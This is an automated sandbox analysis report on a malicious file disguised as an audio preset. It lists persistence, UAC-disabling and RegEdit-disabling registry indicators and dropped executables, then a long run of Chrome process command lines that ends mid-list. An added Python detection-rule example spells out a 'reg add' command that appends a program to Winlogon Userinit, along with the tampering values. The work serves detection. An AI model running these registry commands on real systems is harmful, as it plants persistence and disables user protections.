Analysis Overview
SHA256
50b7daff30ae9ab477edcd35cee332b8a38d61aad5823bfa57cec31d8e226d24
Threat Level: Known bad
The file All Numby_s Impact Presets.sfpreset was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Modifies WinLogon for persistence
Sets file to hidden
Disables RegEdit via registry modification
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Sets desktop wallpaper using registry
Drops file in Program Files directory
Enumerates physical storage devices
Browser Information Discovery
System Location Discovery: System Language Discovery
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Views/modifies file attributes
Runs .reg file with regedit
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Modifies registry key
Modifies data under HKEY_USERS
Uses Volume Shadow Copy WMI provider
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-20 18:57
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-20 18:57
Reported
2024-10-20 19:15
Platform
win7-20241010-en
Max time kernel
1016s
Max time network
1049s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\launch.exe" | C:\Windows\system32\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\vc_redist.x86.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\Desktop\wallpaper = "C:\\hello.jpg" | C:\Windows\system32\reg.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\msg.exe | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\mypc.exe | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\date.txt | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\ | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File opened for modification | C:\Program Files (x86)\ | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\hello.reg | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\launch.exe | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\mover.exe | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\shaking.exe | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\erode.exe | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\hello.bat | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\hello.jpg | C:\Users\Admin\Downloads\No Escape.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\vc_redist.x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\vc_redist.x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\Downloads\BonziBuddy - CHIP Installer _bZQvv.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\BonziBuddy - CHIP Installer _bZQvv.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\BonziBuddy - CHIP Installer _bZQvv.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
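The four reg.exe writes listed under Modifies WinLogon for persistence, UAC bypass, Disables RegEdit via registry modification and Sets desktop wallpaper using registry are the most durable indicators in this report, and they translate directly into detection rules. The Python below is an added example, not part of the report or of any tool named on it: it normalises the NT-native key paths the report prints (\REGISTRY\MACHINE\..., \REGISTRY\USER\<SID>\...) and the HKLM/HKU/HKCU spellings Sysmon and reg.exe use into one form, applies one rule per signature, and also parses a reg add command line. The sample events are constructed from the Indicator column; the benign svchost.exe Userinit write and the reg add command line are assumptions, since the report's Command Line field is empty. The ATT&CK IDs in the rule comments are this example's mapping, not the report's.

```python
"""Added example: detection rules for the reg.exe registry writes in this report."""
import re
from dataclasses import dataclass

# Hive prefixes (lower-cased) mapped to the short form the rules use.
# HKCU is folded into hku\<sid> so one rule matches every user hive.
_HIVE_PREFIXES = {
    "\\registry\\machine\\": "hklm\\",
    "hkey_local_machine\\": "hklm\\",
    "\\registry\\user\\": "hku\\",
    "hkey_users\\": "hku\\",
    "hkey_current_user\\": "hku\\<sid>\\",
    "hkcu\\": "hku\\<sid>\\",
}
_SID_RE = re.compile(r"s-1-5-21-\d+-\d+-\d+-\d+")


@dataclass
class RegEvent:
    key: str    # registry key path in any of the spellings above
    value: str  # value name, e.g. "Userinit"
    data: str   # data as a string ("0" for a DWORD 0)
    image: str  # process that performed the write


def normalize_key(path: str) -> str:
    """Lower-case, strip a trailing backslash, map the hive prefix and
    replace a concrete user SID with the placeholder <sid>."""
    p = path.strip().rstrip("\\").lower()
    for prefix, hive in _HIVE_PREFIXES.items():
        if p.startswith(prefix):
            p = hive + p[len(prefix):]
            break
    return _SID_RE.sub("<sid>", p)


def _userinit_is_default(data: str) -> bool:
    """Windows ships Userinit as 'C:\\Windows\\system32\\userinit.exe,' (note the
    trailing comma). Any extra comma-separated entry is an additional logon program."""
    entries = [e.strip().lower() for e in data.split(",") if e.strip()]
    return entries == [r"c:\windows\system32\userinit.exe"]


# (signature name as printed in the report, normalized key, value name, predicate on data)
RULES = [
    ("Modifies WinLogon for persistence",  # ATT&CK T1547.004 (example's mapping)
     r"hklm\software\microsoft\windows nt\currentversion\winlogon",
     "userinit", lambda d: not _userinit_is_default(d)),
    ("UAC bypass",  # ATT&CK T1548.002 (example's mapping)
     r"hklm\software\microsoft\windows\currentversion\policies\system",
     "enablelua", lambda d: d.strip().lower() in ("0", "0x0")),
    ("Disables RegEdit via registry modification",  # ATT&CK T1112 (example's mapping)
     r"hku\<sid>\software\microsoft\windows\currentversion\policies\system",
     "disableregistrytools", lambda d: d.strip().lower() in ("1", "0x1")),
    ("Sets desktop wallpaper using registry",  # weak alone; corroborates the others
     r"hku\<sid>\control panel\desktop",
     "wallpaper", lambda d: True),
]


def detect(events):
    """Return (signature name, event) for every event that satisfies a rule."""
    hits = []
    for ev in events:
        key = normalize_key(ev.key)
        for name, rule_key, rule_value, is_bad in RULES:
            if key == rule_key and ev.value.lower() == rule_value and is_bad(ev.data):
                hits.append((name, ev))
    return hits


_TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')  # double-quoted token or bare token


def parse_reg_add(cmdline: str, image: str = r"C:\Windows\system32\reg.exe"):
    """Parse `reg add <key> /v <name> [/t <type>] /d <data> [/f]` into a RegEvent;
    return None for anything that is not a reg add command."""
    toks = [q if q else s for q, s in _TOKEN_RE.findall(cmdline)]
    low = [t.lower() for t in toks]
    is_reg = len(low) >= 3 and (low[0] in ("reg", "reg.exe") or low[0].endswith("\\reg.exe"))
    if not is_reg or low[1] != "add":
        return None
    value, data = "", ""
    for i, t in enumerate(low[3:], start=3):
        if t == "/v" and i + 1 < len(toks):
            value = toks[i + 1]
        elif t == "/d" and i + 1 < len(toks):
            data = toks[i + 1]
    return RegEvent(key=toks[2], value=value, data=data, image=image)


# Constructed sample: the four writes the report attributes to reg.exe (paths and data
# copied from the Indicator column) plus one assumed-benign write that must not fire.
REG = r"C:\Windows\system32\reg.exe"
USER_HIVE = "\\REGISTRY\\USER\\S-1-5-21-3692679935-4019334568-335155002-1000"
SAMPLE_EVENTS = [
    RegEvent(r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
             "Userinit", r"C:\Windows\system32\userinit.exe,C:\launch.exe", REG),
    RegEvent(r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
             "EnableLUA", "0", REG),
    RegEvent(USER_HIVE + r"\Software\Microsoft\Windows\CurrentVersion\Policies\System",
             "DisableRegistryTools", "1", REG),
    RegEvent(USER_HIVE + r"\Control Panel\Desktop", "wallpaper", r"C:\hello.jpg", REG),
    RegEvent(r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
             "Userinit", r"C:\Windows\system32\userinit.exe,", r"C:\Windows\system32\svchost.exe"),
]
# Assumed reg.exe command line for the Userinit write (the report's Command Line field is empty).
SAMPLE_CMDLINE = (r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" '
                  r'/v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\launch.exe" /f')

if __name__ == "__main__":
    for name, ev in detect(SAMPLE_EVENTS):
        print(f"{name}: {ev.image} set {ev.value} = {ev.data!r}")
    print("from command line:", [n for n, _ in detect([parse_reg_add(SAMPLE_CMDLINE)])])
```

To run this against real telemetry, build a RegEvent from each Sysmon Event ID 13 record (TargetObject holds the key plus value name, Details the data, Image the writer); Sysmon prints keys as HKLM\... and HKU\S-1-5-...\..., which the normaliser folds into the same form as the report's \REGISTRY\... paths. The Userinit rule compares against the shipped default rather than a blocklist, so any appended program is caught, not only C:\launch.exe; the EnableLUA rule fires on the value alone because the change only takes effect after a reboot and is rarely a legitimate administrative action on a workstation; the wallpaper rule is deliberately unconditional and is only worth alerting on when it co-occurs with the other three, as it does in this report.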
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\All Numby_s Impact Presets.sfpreset"
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\All Numby_s Impact Presets.sfpreset
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1460 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --mojo-platform-channel-handle=3332 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3428 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3580 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2748 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --mojo-platform-channel-handle=3572 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --mojo-platform-channel-handle=3724 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --mojo-platform-channel-handle=748 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --mojo-platform-channel-handle=1628 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=2144 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=3704 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --mojo-platform-channel-handle=1956 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=1984 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=3564 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=2304 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=2412 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --mojo-platform-channel-handle=2792 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --mojo-platform-channel-handle=3836 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --mojo-platform-channel-handle=3788 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --mojo-platform-channel-handle=1172 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --mojo-platform-channel-handle=108 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --mojo-platform-channel-handle=3404 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3880 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --mojo-platform-channel-handle=752 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --mojo-platform-channel-handle=736 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --mojo-platform-channel-handle=3952 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --mojo-platform-channel-handle=892 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --mojo-platform-channel-handle=3336 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --mojo-platform-channel-handle=1980 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1064 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --mojo-platform-channel-handle=3436 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --mojo-platform-channel-handle=1620 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --mojo-platform-channel-handle=3384 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --mojo-platform-channel-handle=2612 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --mojo-platform-channel-handle=4148 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --mojo-platform-channel-handle=2344 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --mojo-platform-channel-handle=4264 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --mojo-platform-channel-handle=5408 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5260 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4956 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --mojo-platform-channel-handle=6056 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --mojo-platform-channel-handle=6084 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
